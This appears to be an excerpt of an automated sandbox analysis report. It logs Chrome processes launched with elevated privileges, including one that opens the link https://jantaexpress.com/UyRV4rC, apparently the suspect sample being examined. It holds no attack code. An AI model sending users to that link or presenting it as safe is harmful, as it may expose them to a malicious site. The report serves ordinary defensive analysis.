                                                                              Start time:08:17:07
                                                                              Start date:20/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                              Imagebase:0x7ff684c40000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:08:17:11
                                                                              Start date:20/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=1960,i,10537831139675820418,16280064094010099974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff684c40000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:4
                                                                              Start time:08:17:17
                                                                              Start date:20/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jantaexpress.com/UyRV4rC"
                                                                              Imagebase:0x7ff684c40000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              No disassembly